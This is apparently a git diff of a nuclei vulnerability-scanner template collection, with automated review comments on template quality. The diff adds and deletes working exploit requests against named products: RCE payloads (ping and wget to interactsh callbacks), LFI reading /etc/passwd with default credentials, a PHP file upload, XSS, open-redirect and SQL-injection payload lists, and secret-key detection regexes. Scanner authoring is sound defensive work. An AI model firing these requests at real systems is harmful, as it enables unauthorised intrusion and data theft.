@@ -1,47 +0,0 @@ -id: GLPI_Exposed_Data -info: - author: RedTeamBrasil - description: "By default many system admins allow directory listening" - name: "Exposed data in GLPI" - reference: "N/A" - severity: high - tags: "glpi,misconfiguration,data,exposed" -requests: - - method: GET - payloads: - expose_data: - - /glpi/files/_sessions/ - - /glpi/files/_sesasdfasdsions/ - - /glpi/files/_dumps/ - - /files/_tmp/ - - /files/_uploads/ - - /files/_log/ - - /glpi/_dumps/ - - /glpi/_pictures/ - - /glpi/_sessions/ - - /glpi/_tmp/ - - /glpi/_uploads/ - - /glpi/files/_dumps/ - - /glpi/files/_pictures/ - - /glpi/files/_sessions/ - - /glpi/files/_tmp/ - - /glpi/files/_uploads/ - - /glpi/files/_log/ - - /glpi/config/ - - /files/ZIP/ - - /glpi/files/ZIP/ - raw: - - | - GET {{expose_data}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close - attack: batteringram - threads: 10 - matchers: - - part: body - type: word - words: - - "Index of" diff --git a/nuclei-templates/Other/GT-AC2900-login.yaml b/nuclei-templates/Other/GT-AC2900-login.yaml deleted file mode 100644 index bb0175987d..0000000000 --- a/nuclei-templates/Other/GT-AC2900-login.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: GT-AC2900-login -info: - name: GT-AC2900 登录绕过 - author: Str1am - severity: critical - reference: https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md - tags: AC2900,ASSUS -requests: - - raw: - - | - GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 - Host: {{Hostname}} - Cookie: asus_token=\0Invalid; clickedItem_tab=0 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "get_cfg_clientlist" - part: body - condition: and 
diff --git a/nuclei-templates/Other/geovision-rce.yaml b/nuclei-templates/Other/Geovision-rce.yaml similarity index 100% rename from nuclei-templates/Other/geovision-rce.yaml rename to nuclei-templates/Other/Geovision-rce.yaml diff --git a/nuclei-templates/Other/getsimple-leakage.yaml b/nuclei-templates/Other/GetSimple-leakage.yaml similarity index 100% rename from nuclei-templates/Other/getsimple-leakage.yaml rename to nuclei-templates/Other/GetSimple-leakage.yaml diff --git a/nuclei-templates/Other/hadoop-yarn-rpc-rce.yaml b/nuclei-templates/Other/Hadoop-Yarn-RPC-RCE.yaml similarity index 100% rename from nuclei-templates/Other/hadoop-yarn-rpc-rce.yaml rename to nuclei-templates/Other/Hadoop-Yarn-RPC-RCE.yaml diff --git a/nuclei-templates/Other/ssrf-injection.yaml b/nuclei-templates/Other/Header-Injection.yaml similarity index 100% rename from nuclei-templates/Other/ssrf-injection.yaml rename to nuclei-templates/Other/Header-Injection.yaml diff --git a/nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_Files.yaml b/nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_report.yaml similarity index 100% rename from nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_Files.yaml rename to nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_report.yaml diff --git a/nuclei-templates/Other/jeesite-default-login.yaml b/nuclei-templates/Other/JeeSite-default-login.yaml similarity index 100% rename from nuclei-templates/Other/jeesite-default-login.yaml rename to nuclei-templates/Other/JeeSite-default-login.yaml diff --git a/nuclei-templates/Other/Karel-ip-phone-lfi.yaml b/nuclei-templates/Other/Karel-ip-phone-lfi.yaml deleted file mode 100644 index d7f751d79f..0000000000 --- a/nuclei-templates/Other/Karel-ip-phone-lfi.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: karel-ip-phone-lfi -info: - name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion - author: 0x_Akoko - severity: high - description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. - reference: - - https://cxsecurity.com/issue/WLB-2020100038 - - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: karel,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" - headers: - Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/nuclei-templates/Other/kingdee-file-list.yaml b/nuclei-templates/Other/Kingdee-file-list.yaml similarity index 100% rename from nuclei-templates/Other/kingdee-file-list.yaml rename to nuclei-templates/Other/Kingdee-file-list.yaml diff --git a/nuclei-templates/Other/kingsoft-default-login.yaml b/nuclei-templates/Other/Kingsoft-default-login.yaml similarity index 100% rename from nuclei-templates/Other/kingsoft-default-login.yaml rename to nuclei-templates/Other/Kingsoft-default-login.yaml diff --git a/nuclei-templates/Other/kingsoft-rce.yaml b/nuclei-templates/Other/Kingsoft-rce.yaml similarity index 100% rename from nuclei-templates/Other/kingsoft-rce.yaml rename to nuclei-templates/Other/Kingsoft-rce.yaml diff --git a/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml b/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml deleted file mode 100644 index 2523c8afde..0000000000 --- a/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml +++ /dev/null 
@@ -1,46 +0,0 @@ -id: landray-oa-treexml-rce - -info: - name: Landray OA Treexml.tmpl - Remote Code Execution - author: tangxiaofeng7,SleepingBag945 - severity: high - description: | - There is a remote command execution vulnerability in Lanling OA treexml.tmpl. An attacker can obtain server permissions by sending a specific request package. - reference: - - https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce/blob/main/landray-oa-treexml-rce.yaml - - https://vuls.info/PeiQi/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#_4 - metadata: - verified: true - max-request: 1 - fofa-query: app="Landray-OA系统" - tags: landray,oa,treexml,rce - -http: - - raw: - - | - POST /data/sys-common/treexml.tmpl HTTP/1.1 - Host: {{Hostname}} - Pragma: no-cache - Content-Type: application/x-www-form-urlencoded - - s_bean=ruleFormulaValidate&script=try {String cmd = "ping {{interactsh-url}}";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: body - words: - - "<RestResponse><success>" - - "<confirm>" - condition: and - - - type: status - status: - - 200 - -# digest: 4b0a0048304602210096f0ba9e6a94142423797bf77a9ada7c90c4b3df0f7a5da5c7f3dca65655cee60221009eaf25bf39f22f5cc51eb59c17943967a388d54fe9aa843d341a6ef2af2af5ce:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/magicflow-sqli.yaml b/nuclei-templates/Other/MagicFlow-sqli.yaml similarity index 100% rename from nuclei-templates/Other/magicflow-sqli.yaml rename to nuclei-templates/Other/MagicFlow-sqli.yaml diff --git a/nuclei-templates/Other/netcore-unauth.yaml b/nuclei-templates/Other/Netcore-unauth.yaml similarity index 100% rename from nuclei-templates/Other/netcore-unauth.yaml rename to nuclei-templates/Other/Netcore-unauth.yaml 
diff --git a/nuclei-templates/Other/netoray-sqli.yaml b/nuclei-templates/Other/Netoray-sqli.yaml
similarity index 100%
rename from nuclei-templates/Other/netoray-sqli.yaml
rename to nuclei-templates/Other/Netoray-sqli.yaml
diff --git a/nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml b/nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml
new file mode 100644
index 0000000000..b35ef84818
--- /dev/null
+++ b/nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml
@@ -0,0 +1,49 @@
+id: Green-Alliance
+
+info:
+ name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability
+ author: Zero Trust Security Attack and Defense Laboratory
+ severity: high
+ description: |
+ Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability
+ metadata:
+ fofa-query: body="'/needUsbkey.php?username='"
+ hunter-query: web.body="'/needUsbkey.php?username='"
+
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/webconf/Exec/index?cmd=id"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "200"
+
+ - type: status
+ status:
+ - 200
+
+
+# http:
+# - method: GET
+# path:
+# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}"
+
+# attack: clusterbomb
+# matchers-condition: or
+# matchers:
+# - type: word
+# part: interactsh_protocol
+# name: http
+# words:
+# - "http"
+
+# - type: word
+# part: interactsh_protocol
+# name: dns
+# words:
+# - "dns"
diff --git a/nuclei-templates/Other/Nsfocus_sas_getFile_read.yaml b/nuclei-templates/Other/Nsfocus_sas_getFile_read.yaml
deleted file mode 100644
index a8f9cbe173..0000000000
--- a/nuclei-templates/Other/Nsfocus_sas_getFile_read.yaml
+++ /dev/null
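Review bot: `id: Green-Alliance` in Nsfocus_NF_Firewall_FileUpload.yaml is a bare vendor name, and it is the same id the deleted `Nsfocus_sas_getFile_read.yaml` later in this diff used for a different vulnerability, so findings from the two templates would have been indistinguishable by id in any report; a specific id in the repository's usual form, e.g. `id: nsfocus-sas-exec-rce`, is needed, and the filename (`NF_Firewall_FileUpload`) should agree with the `name:`, which describes a SAS fortress command-execution issue. The body matcher `words: ["200"]` paired with `status: 200` is close to tautological — almost any page containing the digits 200 satisfies it — so this high-severity template will over-report; the matcher should key on something specific to the vulnerable response, and `tags:` is missing entirely. The commented-out interactsh variant at the bottom is not validated by nuclei and should be either removed or kept as a short note, since it currently doubles the file with dead configuration.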
@@ -1,59 +0,0 @@ -id: Green-Alliance - -info: - name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high - description: | - Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets - metadata: - fofa-query: app="NSFOCUS-下一代防火墙" - hunter-query: web.title="用户认证 - NSFOCUS NF" - - - -http: - - raw: - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 238 - Accept-Encoding: gzip, deflate - Connection: close - - --1d52ba2a11ad8a915eddab1a0e85acd9 - Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" - - lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; - --1d52ba2a11ad8a915eddab1a0e85acd9-- - - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 217 - Accept-Encoding: gzip, deflate - Connection: close - - --4803b59d015026999b45993b1245f0ef - Content-Disposition: form-data; name="file"; filename="compose.php" - - <?php echo '{{randstr}}';unlink(__FILE__);?> - --4803b59d015026999b45993b1245f0ef-- - - - | - GET /mail/include/header_main.php HTTP/1.1 - Host: {{Host}}:4433 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 
&& contains(body_1, 'upload file success')" - - "status_code_2 == 200 && contains(body_2, 'upload file success')" - - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" - condition: and diff --git a/nuclei-templates/Other/OpenRedirect.yaml b/nuclei-templates/Other/OpenRedirect.yaml new file mode 100644 index 0000000000..52afa349a8 --- /dev/null +++ b/nuclei-templates/Other/OpenRedirect.yaml 
@@ -0,0 +1,117 @@ +id: open-redirect +info: + name: Open URL redirect detection + author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik + severity: low + description: A user-controlled input redirects users to an external website. + tags: redirect,generic +requests: + - raw: + - | + GET /{{redirect}} HTTP/1.1 + Host: {{Hostname}} + payloads: + redirect: + - '%0a/interact.sh/' + - '%0d/interact.sh/' + - '%00/interact.sh/' + - '%09/interact.sh/' + - '%5C%5Cinteract.sh/%252e%252e%252f' + - '%5Cinteract.sh' + - '%5cinteract.sh/%2f%2e%2e' + - '%5c{{RootURL}}interact.sh/%2f%2e%2e' + - '../interact.sh' + - '.interact.sh' + - '/%5cinteract.sh' + - '////\;@interact.sh' + - '////interact.sh' + - '///interact.sh' + - '///interact.sh/%2f%2e%2e' + - '///interact.sh@//' + - '///{{RootURL}}interact.sh/%2f%2e%2e' + - '//;@interact.sh' + - '//\/interact.sh/' + - '//\@interact.sh' + - '//\interact.sh' + - '//\tinteract.sh/' + - '//interact.sh/%2F..' + - '//interact.sh//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//interact.sh@//' + - '//interact.sh\tinteract.sh/' + - '//https://interact.sh@//' + - '/<>//interact.sh' + - '/\/\/interact.sh/' + - '/\/interact.sh' + - '/\interact.sh' + - '/interact.sh' + - '/interact.sh/%2F..' 
+ - '/interact.sh/' + - '/interact.sh/..;/css' + - '/https:interact.sh' + - '/{{RootURL}}interact.sh/' + - '/〱interact.sh' + - '/〵interact.sh' + - '/ゝinteract.sh' + - '/ーinteract.sh' + - '/ーinteract.sh' + - '<>//interact.sh' + - '@interact.sh' + - '@https://interact.sh' + - '\/\/interact.sh/' + - 'interact%E3%80%82sh' + - 'interact.sh' + - 'interact.sh/' + - 'interact.sh//' + - 'interact.sh;@' + - 'https%3a%2f%2finteract.sh%2f' + - 'https:%0a%0dinteract.sh' + - 'https://%0a%0dinteract.sh' + - 'https://%09/interact.sh' + - 'https://%2f%2f.interact.sh/' + - 'https://%3F.interact.sh/' + - 'https://%5c%5c.interact.sh/' + - 'https://%5cinteract.sh@' + - 'https://%23.interact.sh/' + - 'https://.interact.sh' + - 'https://////interact.sh' + - 'https:///interact.sh' + - 'https:///interact.sh/%2e%2e' + - 'https:///interact.sh/%2f%2e%2e' + - 'https:///interact.sh@interact.sh/%2e%2e' + - 'https:///interact.sh@interact.sh/%2f%2e%2e' + - 'https://:80#@interact.sh/' + - 'https://:80?@interact.sh/' + - 'https://:@\@interact.sh' + - 'https://:@interact.sh\@interact.sh' + - 'https://:@interact.sh\@WillBeReplaced.com' + - 'https://;@interact.sh' + - 'https://\tinteract.sh/' + - 'https://interact.sh/interact.sh' + - 'https://interact.sh/https://interact.sh/' + - 'https://www.\.interact.sh' + - 'https:/\/\interact.sh' + - 'https:/\interact.sh' + - 'https:/interact.sh' + - 'https:interact.sh' + - '{{RootURL}}interact.sh' + - '〱interact.sh' + - '〵interact.sh' + - 'ゝinteract.sh' + - 'ーinteract.sh' + - 'ーinteract.sh' + - 
'?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh' + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - type: status + status: + - 301 + - 302 + - 307 + - 308 + condition: or diff --git a/nuclei-templates/Other/Oracle-OAM-XSS.yaml b/nuclei-templates/Other/Oracle-OAM-XSS.yaml deleted file mode 100644 index 904ec6970b..0000000000 --- a/nuclei-templates/Other/Oracle-OAM-XSS.yaml +++ /dev/null 
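Review bot: The template uses the legacy `requests:` section while the other new templates in this commit (e.g. the Nsfocus file) use the current `http:` key; nuclei still accepts `requests:`, but mixing both forms in one repository makes validation and linting noisier. Several payloads appear twice in adjacent entries (`'/ーinteract.sh'` and `'ーinteract.sh'`), which only costs requests unless the two entries differ by an invisible code point — worth checking with a hex view. The regex matcher is annotated with a regex101 link, which is good; a `reference:` entry in `info` naming the payload source would complete the block.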
@@ -1,24 +0,0 @@ -id: Oracle-OAM-XSS -info: - name: Oracle OAM - XSS - author: dk4trin - severity: medium - description: Cross-site scripting (XSS) on Oracle OAM - tags: xss,oracle -requests: - - method: GET - path: - - '{{BaseURL}}/oam/pages/error.jsp?error=javascript%3A%2F%2Axssx%27%22%3E--%3E%3C%2Fnoscript%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3C%2Fstyle%3E%3C%2Ftemplate%3E%3C%2Fnoembed%3E%3C%2Fscript%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%2F%2F%3E%2A%2F%3Btop.alert%282%29%2F%2F' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "alert(1)//>*/;top.alert(2)//" - part: body - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/Other/Path-Traversal.yaml b/nuclei-templates/Other/Path-Traversal.yaml deleted file mode 100644 index 09b46ce63d..0000000000 --- a/nuclei-templates/Other/Path-Traversal.yaml +++ /dev/null 
@@ -1,67 +0,0 @@ - -id: LFI - -info: - name: Local File Inclusion - author: pikpikcu - severity: high - -requests: - - method: GET - path: - - '{{BaseURL}}/etc/passwd' - - '{{BaseURL}}/etc/shadow%00' - - '{{BaseURL}}/etc/passwd' - - '{{BaseURL}}/etc/passwd%00' - - '{{BaseURL}}../etc/passwd' - - '{{BaseURL}}../etc/passwd%00' - - '{{BaseURL}}../../etc/passwd' - - '{{BaseURL}}../../etc/passwd%00' - - '{{BaseURL}}../../../etc/passwd' - - '{{BaseURL}}../../../etc/passwd%00' - - '{{BaseURL}}../../../../etc/passwd' - - '{{BaseURL}}../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../etc/passwd' - - '{{BaseURL}}../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd' - - 
'{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00' - - '{{BaseURL}}../../../../../../etc/passwd&=%3C%3C%3C%3C' - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body diff --git a/nuclei-templates/Other/Pictatic-API-key.yaml b/nuclei-templates/Other/Pictatic-API-key.yaml new file mode 100644 index 0000000000..946aed1ebf --- /dev/null +++ b/nuclei-templates/Other/Pictatic-API-key.yaml @@ -0,0 +1,13 @@ +id: pictatic-api-key +info: + name: Pictatic API Key + author: gaurang + severity: high + tags: token,file +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "sk_live_[0-9a-z]{32}" 
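Review bot: The extractor regex `sk_live_[0-9a-z]{32}` describes a Stripe-style live secret key prefix rather than anything Pictatic-specific, so hits from this template will largely be Stripe keys and the finding name will mislead triage. If the Pictatic format really is `sk_live_` plus 32 lowercase alphanumerics, say so in a `description:` with a `reference:`; otherwise the template duplicates a Stripe token check and should be renamed or dropped. The character class also excludes uppercase, which is only correct if the provider never emits it — confirm against its documentation.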
diff --git a/nuclei-templates/Other/RedMine-Detect.yaml b/nuclei-templates/Other/Redmine-Default-Login.yaml similarity index 100% rename from nuclei-templates/Other/RedMine-Detect.yaml rename to nuclei-templates/Other/Redmine-Default-Login.yaml diff --git a/nuclei-templates/Other/SPON-IP-rce.yaml b/nuclei-templates/Other/SPON-IP-rce.yaml new file mode 100644 index 0000000000..ce427145b6 --- /dev/null +++ b/nuclei-templates/Other/SPON-IP-rce.yaml @@ -0,0 +1,26 @@ +id: SPON-IP-rce +info: + name: SPON IP 网络对讲广播系统 rce + author: Str1am + severity: high + reference: https://poc.shuziguanxing.com/?#/publicIssueInfo#issueId=4578 + tags: SPON,rce +requests: + - raw: + - | + POST /php/ping.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 + + jsondata[ip]=%7Cecho aaaabbb&jsondata[type]=0 + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "aaaabbb" + part: body + condition: and diff --git a/nuclei-templates/Other/SQLInjection_ERROR.yaml b/nuclei-templates/Other/SQLInjection_ERROR.yaml index 34327d8061..471df51094 100644 --- a/nuclei-templates/Other/SQLInjection_ERROR.yaml +++ b/nuclei-templates/Other/SQLInjection_ERROR.yaml @@ -1,10 +1,13 @@ id: SQLInjection_ERROR + info: name: SQLINJECTION Detection - author: 0x240x23elu & OFJAAAH + author: mijan severity: High + requests: - method: GET + path: - "{{BaseURL}}'" - "{{BaseURL}} 1 or 1" 
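Review bot: The word matcher on the fixed literal `aaaabbb` cannot distinguish command execution from simple reflection, since a server that echoes the `jsondata[ip]` parameter back into the page returns the same string; templates elsewhere in this commit use `{{randstr}}` for such markers, which at least defeats cached or pre-seeded responses. The `info` block carries no `description:`, and `tags: SPON,rce` mixes case where every other template on the page uses lowercase tags. `requests:` is the legacy spelling of the `http:` section.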
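Review bot: `author: mijan` replaces `0x240x23elu & OFJAAAH` instead of adding to them, which drops the original attribution for a template whose request list and regexes are otherwise unchanged; use `author: 0x240x23elu,OFJAAAH,mijan`. `severity: High` is capitalised while every other template in this commit uses lowercase (`severity: high`); nuclei normalises case, but the inconsistency will trip any linter run over the repository. The hunk ends before the rest of the `path:` list, so the remaining payload lines are outside the visible diff.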
@@ -33,15 +36,15 @@ requests: - "{{BaseURL}} 1' GROUP BY 1,2,--+" - "{{BaseURL}} 1' GROUP BY 1,2,3--+" - "{{BaseURL}} ' GROUP BY columnnames having 1=1 --" + extractors: - type: regex part: body regex: - "SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient.|mysqli_error|mysqli_query" - "PostgreSQL.*ERROR|Warning.*Wpg_.*|valid PostgreSQL resultNpgsql." - # - "Driver.* SQL[-_ ]*Server|OLE DB.* SQL Server|(W|A)SQL Server.*Driver|Warning.*mssql_.*|(W|A)SQL Server.*[0-9a-fA-F]{8}|(?s)Exception.*WSystem.Data.SqlClient.|(?s)Exception.*WRoadhouse.Cms.)" - "Microsoft Access Driver|JET Database Engine|Access Database Engine" - "ORA-[0-9][0-9][0-9][0-9]|Oracle error|Oracle.*Driver|Warning.*Woci_.*|Warning.*Wora_.*" - "CLI Driver.*DB2|DB2 SQL error|bdb2_w+" - "SQLite/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*sqlite_.*|Warning.*SQLite3::|SQLITE_ERROR" - - "(?i)Warning.*sybase.*|Sybase message|Sybase.*Server message.*" + - "(?i)Warning.*sybase.*|Sybase message|Sybase.*Server message.*" \ No newline at end of file diff --git a/nuclei-templates/Other/sendgrid-api.yaml b/nuclei-templates/Other/Sendgrid-api.yaml similarity index 100% rename from nuclei-templates/Other/sendgrid-api.yaml rename to nuclei-templates/Other/Sendgrid-api.yaml diff --git a/nuclei-templates/Other/shipped100-sqli.yaml b/nuclei-templates/Other/Shipped100-sqli.yaml similarity index 100% rename from nuclei-templates/Other/shipped100-sqli.yaml rename to nuclei-templates/Other/Shipped100-sqli.yaml diff --git a/nuclei-templates/Other/shopify-token-11863.yaml b/nuclei-templates/Other/Shopify-token.yaml similarity index 100% rename from nuclei-templates/Other/shopify-token-11863.yaml rename to nuclei-templates/Other/Shopify-token.yaml diff --git a/nuclei-templates/Other/sitecore.yaml b/nuclei-templates/Other/SiteCore.yaml similarity index 100% rename from nuclei-templates/Other/sitecore.yaml rename to nuclei-templates/Other/SiteCore.yaml 
diff --git a/nuclei-templates/Other/Springboot-Loggers.yaml b/nuclei-templates/Other/Springboot-Loggers.yaml deleted file mode 100755 index 4c5f838a1d..0000000000 --- a/nuclei-templates/Other/Springboot-Loggers.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: Springboot-Loggers -info: - name: Detect Springboot Loggers - author: - - l0ne1y - description: |- - SprinBoot Loggers安全配置错误导致信息泄露 - 安全配置错误可以发生在一个应用程序堆栈的任何层面,包括网络服务,平台,web服务器、应用服务器、数据库、框架、自定义的代码、预安装的虚拟机、容器、存储等。 - 通常是由于不安全的默认配置、不完整的临时配置、开源云存储、错误的HTTP 标头配置以及包含敏感信息的详细错误信息所造成的,可能导致部分信息泄露。 - severity: low - remediation: |- - #### 官方修复方案: - 升级系统至无漏洞版本,或于官网下载安全补丁。 -requests: -- matchers: - - type: word - condition: and - part: body - words: - - '"loggers"' - - '"levels"' - - type: status - status: - - 200 - - type: word - condition: or - part: header - words: - - application/json - - application/vnd.spring-boot.actuator - - application/vnd.spring-boot.actuator.v1+json - matchers-condition: and - path: - - '{{BaseURL}}/loggers' - - '{{BaseURL}}/actuator/loggers' - method: GET diff --git a/nuclei-templates/Other/Square-access-token.yaml b/nuclei-templates/Other/Square-access-token.yaml new file mode 100644 index 0000000000..e0a5d2d1d0 --- /dev/null +++ b/nuclei-templates/Other/Square-access-token.yaml @@ -0,0 +1,14 @@ +id: square-access-token +info: + name: Square Access Token + author: gaurang,daffainfo + severity: high + tags: token,file,square +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "EAAAE[a-zA-Z0-9_-]{59}" + - "sq0atp-[0-9A-Za-z\\-_]{22}" diff --git a/nuclei-templates/Other/Square-oauth-secret.yaml b/nuclei-templates/Other/Square-oauth-secret.yaml new file mode 100644 index 0000000000..15571e71bc --- /dev/null +++ b/nuclei-templates/Other/Square-oauth-secret.yaml 
